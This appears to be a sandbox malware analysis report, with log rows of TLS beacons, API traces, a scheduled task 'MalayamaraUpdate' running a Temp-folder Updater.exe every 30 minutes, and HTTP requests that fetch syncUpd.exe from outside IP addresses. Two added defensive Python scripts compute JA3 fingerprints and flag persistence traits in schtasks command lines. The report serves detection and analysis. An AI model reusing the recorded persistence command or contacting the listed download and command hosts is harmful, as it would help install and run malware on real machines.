TLSv1 192.168.56.101:50309 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50187 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50318 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50163 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50198 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50319 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50201 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50177 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50328 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50206 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50184 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50334 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49206 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50189 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50337 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50173 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50190 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50343 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50176 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50178 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50349 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50348 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50180 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50354 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50191 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50357 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50363 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50195 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50208 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50365 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50197 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50367 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50210 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50370 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50192 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50215 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50193 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50216 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50194 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50384 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50223 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50387 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50226 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50390 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50199 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50233 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50248 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50205 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50249 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50218 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50250 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50232 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50253 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50254 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50258 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50260 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50264 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50236 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50272 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50242 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50279 -> 154.92.15.189:443 C=US, O=Let's Encrypt, CN=R3 CN=i.alie3ksgaa.com e3:88:72:04:24:5c:12:17:a4:e2:c1:d9:33:f0:d9:60:91:71:d3:dc
TLSv1 192.168.56.101:50245 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50286 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49290 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50255 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50287 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50266 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50290 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50270 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50305 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50280 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50311 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50282 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:49374 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50320 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50288 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50321 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50293 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50324 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50299 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50325 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50301 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50329 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50302 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50331 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50315 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50333 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50316 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50335 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50322 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50352 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50346 -> 154.92.15.189:443 C=US, O=Let's Encrypt, CN=R3 CN=i.alie3ksgaa.com e3:88:72:04:24:5c:12:17:a4:e2:c1:d9:33:f0:d9:60:91:71:d3:dc
TLSv1 192.168.56.101:50371 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50217 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50377 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50219 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50353 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50379 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50221 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50355 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50225 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50356 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50227 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50360 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50238 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50366 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50240 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50378 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50268 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50380 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50273 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50381 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50383 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50278 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50386 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50283 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50388 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50284 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50389 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50298 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50303 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50310 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50314 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50332 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50336 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50338 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50342 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50351 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50359 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50362 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50368 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50369 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50374 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50382 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50385 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50146 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50149 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50154 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50164 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50166 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50181 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50182 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50185 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50186 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50200 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50204 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50214 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50222 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50229 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50231 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50234 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50243 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50261 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50263 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50271 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50274 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50285 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50289 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50292 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50294 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50306 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50308 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50312 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50317 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50326 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50327 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50330 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50344 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50345 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50347 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50350 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50358 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50361 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50364 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50372 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50373 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50375 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50376 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50391 -> 154.92.15.189:443 None None None
TLSv1 192.168.56.101:50392 -> 154.92.15.189:443 None None None
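
Nearly every TLS row above records no issuer, subject or certificate fingerprint, yet each of those sessions still produced an SSLBL alert. That is consistent with how the JA3 rule works: it hashes fields of the ClientHello, which the client sends before any certificate arrives, so a handshake that never completes can still match. The block below is an added example, not part of the ZeroBOX report or the SSLBL ruleset: it parses a ClientHello record and rebuilds the JA3 string (client_version, cipher suites, extension types, supported groups, EC point formats, with GREASE values removed) and its MD5. The ClientHello is constructed for the example and is not taken from this sample's traffic; the Tofsee hash that the rule matches is not on the page and is not reproduced here.

```python
"""Recompute a JA3 client fingerprint from a raw TLS ClientHello (added example)."""
import hashlib
import struct

EXT_SUPPORTED_GROUPS = 0x000A
EXT_EC_POINT_FORMATS = 0x000B


def is_grease(value):
    """RFC 8701 GREASE values (0x0a0a, 0x1a1a, ...) are dropped by JA3."""
    return (value & 0x0F0F) == 0x0A0A and (value >> 8) == (value & 0xFF)


def parse_client_hello(record):
    """Return (client_version, ciphers, extensions, groups, point_formats).

    Lengths are checked against the buffer so a truncated capture raises
    instead of yielding a wrong but plausible-looking fingerprint.
    """
    if len(record) < 5 or record[0] != 0x16:
        raise ValueError("not a TLS handshake record")
    hs = record[5:5 + struct.unpack_from("!H", record, 3)[0]]
    if len(hs) < 4 or hs[0] != 0x01:
        raise ValueError("record does not carry a ClientHello")
    body_len = int.from_bytes(hs[1:4], "big")
    body = hs[4:4 + body_len]
    if len(body) != body_len:
        raise ValueError("truncated ClientHello")

    version = struct.unpack_from("!H", body, 0)[0]
    pos = 2 + 32                                   # client_version, random
    pos += 1 + body[pos]                           # session_id
    cs_len = struct.unpack_from("!H", body, pos)[0]
    pos += 2
    ciphers = [struct.unpack_from("!H", body, pos + i)[0] for i in range(0, cs_len, 2)]
    pos += cs_len
    pos += 1 + body[pos]                           # compression_methods

    extensions, groups, formats = [], [], []
    if pos < len(body):
        end = pos + 2 + struct.unpack_from("!H", body, pos)[0]
        pos += 2
        while pos < end:
            etype, elen = struct.unpack_from("!HH", body, pos)
            pos += 4
            data = body[pos:pos + elen]
            pos += elen
            extensions.append(etype)
            if etype == EXT_SUPPORTED_GROUPS:
                glen = struct.unpack_from("!H", data, 0)[0]
                groups = [struct.unpack_from("!H", data, 2 + i)[0] for i in range(0, glen, 2)]
            elif etype == EXT_EC_POINT_FORMATS:
                formats = list(data[1:1 + data[0]])
    return version, ciphers, extensions, groups, formats


def ja3(record):
    """Return (ja3_string, ja3_md5) in the canonical JA3 field order."""
    version, ciphers, exts, groups, formats = parse_client_hello(record)
    ja3_str = ",".join([
        str(version),
        "-".join(str(c) for c in ciphers if not is_grease(c)),
        "-".join(str(e) for e in exts if not is_grease(e)),
        "-".join(str(g) for g in groups if not is_grease(g)),
        "-".join(str(f) for f in formats),
    ])
    return ja3_str, hashlib.md5(ja3_str.encode()).hexdigest()


def build_client_hello(client_version, ciphers, extensions):
    """Assemble a minimal ClientHello record (constructed test input only)."""
    body = struct.pack("!H", client_version) + b"\x11" * 32 + b"\x00"
    body += struct.pack("!H", 2 * len(ciphers)) + b"".join(struct.pack("!H", c) for c in ciphers)
    body += b"\x01\x00"                            # one compression method: null
    ext_bytes = b"".join(struct.pack("!HH", t, len(d)) + d for t, d in extensions)
    body += struct.pack("!H", len(ext_bytes)) + ext_bytes
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


# Constructed ClientHello: TLS 1.2 client_version, one GREASE cipher and one
# GREASE group that JA3 must drop, then SNI (0), supported_groups (10),
# ec_point_formats (11) and session_ticket (35).
SAMPLE_HELLO = build_client_hello(
    0x0303,
    [0x1301, 0xC02B, 0x0A0A, 0x002F],
    [
        (0x0000, b"\x00\x0c\x00\x00\x09localhost"),
        (EXT_SUPPORTED_GROUPS, struct.pack("!HHHH", 6, 0x001D, 0x0017, 0x0A0A)),
        (EXT_EC_POINT_FORMATS, b"\x01\x00"),
        (0x0023, b""),
    ],
)

if __name__ == "__main__":
    print(*ja3(SAMPLE_HELLO), sep="\n")
```

To check a real session from this report, feed the first TLS record of the client side of any flow listed above to ja3() and compare the digest with the SSLBL entry that SID 906200054 refers to; the record version in the outer header (0x0301 here) is not part of the fingerprint, only the client_version inside the ClientHello is.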

Time & API Arguments Status Return Repeated
GetComputerNameW
  computer_name: TEST22-PC
  1 1 0
Time & API Arguments Status Return Repeated
IsDebuggerPresent
  0 0
IsDebuggerPresent
  0 0
Time & API Arguments Status Return Repeated
WriteConsoleW
  buffer: C:\Users\test22\AppData\Roaming\Temp>
  console_handle: 0x00000007
  1 1 0
WriteConsoleW
  buffer: chcp
  console_handle: 0x00000007
  1 1 0
WriteConsoleW
  buffer: C:\Users\test22\AppData\Roaming\Temp>
  console_handle: 0x00000007
  1 1 0
WriteConsoleW
  buffer: schtasks
  console_handle: 0x00000007
  1 1 0
WriteConsoleW
  buffer: /create /tn "MalayamaraUpdate" /tr "'C:\Users\test22\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
  console_handle: 0x00000007
  1 1 0
WriteConsoleW
  buffer: Active code page: 1251
  console_handle: 0x00000013
  1 1 0
WriteConsoleW
  buffer: SUCCESS: The scheduled task "MalayamaraUpdate" has successfully been created.
  console_handle: 0x00000007
  1 1 0
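
The console trace above shows cmd.exe echoing "schtasks" and its arguments in two separate WriteConsoleW buffers; joined with a space they form the command that created the "MalayamaraUpdate" task, which the following SUCCESS line confirms. The block below is an added example, not part of the ZeroBOX report or its signatures: it tokenizes such a command line the way cmd.exe treats double quotes, extracts the schtasks switches, and reports the traits an analyst would pivot on here, namely an action under a user-writable directory, a minute-level trigger and /F to replace an existing task. The directory list, the 60-minute threshold and the /ru and /rl checks are the example's own choices, not something the report states.

```python
"""Flag persistence traits in a schtasks /create command line (added example)."""

# Reconstructed by joining the two WriteConsoleW buffers in the trace above.
OBSERVED_CMD = (
    'schtasks /create /tn "MalayamaraUpdate" '
    '/tr "\'C:\\Users\\test22\\AppData\\Local\\Temp\\Updater.exe\'" '
    "/sc minute /mo 30 /F"
)

# Directories an unprivileged user can write to (example list, lower-case,
# matched as substrings of the lower-cased action path).
USER_WRITABLE = (
    "\\appdata\\local\\temp\\",
    "\\appdata\\roaming\\",
    "\\appdata\\local\\",
    "\\users\\public\\",
    "\\programdata\\",
    "\\windows\\temp\\",
)

# Minute triggers at or below this modifier are treated as beacon-like.
FREQUENT_MINUTES = 60


def tokenize(cmdline):
    """Split on whitespace while honouring double quotes, as cmd.exe does."""
    tokens, cur, quoted = [], [], False
    for ch in cmdline:
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        tokens.append("".join(cur))
    return tokens


def parse_schtasks(cmdline):
    """Return {switch: value or True} for a schtasks invocation, else None."""
    tokens = tokenize(cmdline)
    if not tokens:
        return None
    image = tokens[0].lower().rsplit("\\", 1)[-1]
    if image not in ("schtasks", "schtasks.exe"):
        return None
    opts = {}
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("/"):
            key = tok[1:].lower()
            # A switch takes the next token as its value unless that token
            # is itself a switch (e.g. "/create /tn" or a trailing "/F").
            if i + 1 < len(tokens) and not tokens[i + 1].startswith("/"):
                opts[key] = tokens[i + 1]
                i += 2
                continue
            opts[key] = True
        i += 1
    return opts


def assess(opts):
    """Return the persistence findings for a parsed /create command."""
    findings = []
    if not opts or "create" not in opts:
        return findings
    action = opts.get("tr", "")
    if isinstance(action, str):
        # Strip the single quotes the sample wrapped around its path.
        path = action.strip("'\" ").lower()
        for marker in USER_WRITABLE:
            if marker in path:
                findings.append(f"action under user-writable path: {marker}")
                break
    modifier = str(opts.get("mo", "1"))
    if str(opts.get("sc", "")).lower() == "minute" and modifier.isdigit() \
            and int(modifier) <= FREQUENT_MINUTES:
        findings.append(f"runs every {modifier} minute(s)")
    if "f" in opts:
        findings.append("/F silently replaces an existing task")
    if str(opts.get("ru", "")).lower() in ("system", "nt authority\\system"):
        findings.append("runs as SYSTEM")
    if str(opts.get("rl", "")).lower() == "highest":
        findings.append("requests highest run level")
    return findings


if __name__ == "__main__":
    for finding in assess(parse_schtasks(OBSERVED_CMD)):
        print(finding)
```

The same parser can be pointed at process-creation telemetry (Sysmon event 1 or Security event 4688 command lines) to score every schtasks.exe invocation; anything not starting with schtasks, such as the chcp call echoed above it, is ignored.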
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated
GlobalMemoryStatusEx
  1 1 0
Time & API Arguments Status Return Repeated
__exception__
  stacktrace:
  CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x72951194
  LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x72822ba1
  0x4f0569
  0x4f045b
  DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x727a2652
  DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x727b264f
  DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x727b2e95
  DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728674ec
  DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72867610
  CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x728f1dc4
  CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x728f1e67
  CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x728f1f7a
  _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x728f416a
  _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7415f5a3
  CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x741d7f16
  _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x741d4de3
  RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
  RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5
  exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
  exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
  exception.instruction: leave
  exception.module: KERNELBASE.dll
  exception.exception_code: 0xe0434f4e
  exception.offset: 46887
  exception.address: 0x7597b727
  registers.esp: 4321856
  registers.edi: 0
  registers.eax: 4321856
  registers.ebp: 4321936
  registers.edx: 0
  registers.ebx: 9363280
  registers.esi: 8951472
  registers.ecx: 2332514986
  1 0 0
suspicious_features Connection to IP address suspicious_request GET http://185.172.128.90/cpa/ping.php?substr=nine&s=ab
suspicious_features Connection to IP address suspicious_request GET http://185.172.128.109/syncUpd.exe
request GET http://185.172.128.90/cpa/ping.php?substr=nine&s=ab
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
request GET http://185.172.128.109/syncUpd.exe
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 2293760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00960000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2548
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x727a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2548
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x727a2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 1572864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00c90000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00dd0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x002e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00315000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0031b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00317000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x002fc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x004f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x002ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x735f2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2692
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 57344
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00264000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2692
region_size: 45056
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00520000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2736
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4161536
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00f30000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2736
region_size: 9351168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2788
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000ff08d000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2896
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x735f2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2896
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2804
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 57344
protection: 64 (PAGE_EXECUTE_READWRITE)
